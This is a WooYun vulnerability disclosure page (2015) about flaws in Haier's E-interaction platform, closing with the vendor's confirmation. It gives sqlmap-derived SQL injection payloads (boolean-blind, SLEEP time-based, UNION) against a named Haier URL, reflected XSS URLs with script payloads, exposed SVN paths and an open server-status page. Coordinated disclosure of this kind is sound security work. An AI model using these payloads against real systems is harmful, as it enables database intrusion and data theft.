当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146193

漏洞标题:海尔旗下E互动平台问题小合集

相关厂商:海尔集团

漏洞作者: 染血の雪

提交时间:2015-10-13 09:23

修复时间:2015-11-27 17:58

公开时间:2015-11-27 17:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-23: 细节向核心白帽子及相关领域专家公开
2015-11-02: 细节向普通白帽子公开
2015-11-12: 细节向实习白帽子公开
2015-11-27: 细节向公众公开

简要描述:

问题多多

详细说明:

0x01 SQL注入:

http://s.haier.com/haierproject/saas/aaa.php?q=3458115


payload:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=-8538' OR 6060=6060 AND 'tiLz' LIKE 'tiLz
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=3458115' AND (SELECT * FROM (SELECT(SLEEP(5)))CGLG) AND 'CXWe' LIKE 'CXWe
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=3458115' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x6f4f665174687a594a45,0x7170716b71),NULL--
---
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.12, Apache 2.4.4
back-end DBMS: MySQL 5.0.12


current user is DBA:    True


0x02 SVN泄漏
/haierproject/saas/目录下有好多个,下面可能不全请自行检查

http://s.haier.com/haierproject/Multimedia/upload/image/.svn/entries
http://s.haier.com/haierproject/saas/images/.svn/entries
http://s.haier.com/haierproject/saas/js/.svn/entries
http://s.haier.com/haierproject/saas/phpexcel/.svn/entries


0x03 目录遍历
同上基本上在/haierproject/目录下,不全请自行检查

http://s.haier.com:80/css/
http://s.haier.com:80/haierproject/


0x04 XSS
这个量最多,就随便举几个~

http://s.haier.com/haierproject/fankui-new/fankui/new/pinglun.php?order=r&aid=541&uid=&username=&code=ca7fa90b707b28dc4033b2125efe1de1%22%3E%3CScRiPt%3Ealert%28%27wooyun%27%29%3C/ScRiPt%3E
http://s.haier.com/haierproject/fankui-new/fankui/new/site-info-encrypt.php?fr=pingjia%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://s.haier.com/km100survey/faces/login.jsp?from=xxx%22%3E%3Cscript%3Ealert%28%27wooyun%27%29%3C/script%3E
http://s.haier.com/km100survey/faces/public/registers.jsp?from=xxx%22%3E%3Cscript%3Ealert%28%27wooyun%27%29%3C/script%3E


0x05 其他
信息泄露:

http://s.haier.com/server-status

漏洞证明:

svn信息泄露之类的就不截图了。
注入

K4$IVJ4KSF3TNVQSRVU7DX6.png


%78Q$~DX80L5VML~0_QGW37.png


xss

HPX}K1RVSHY}]XQX3E{XAVQ.png


修复方案:

该平台问题多多建议回炉重造

版权声明:转载请注明来源 染血の雪@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-13 17:56

厂商回复:

感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理

最新状态:

暂无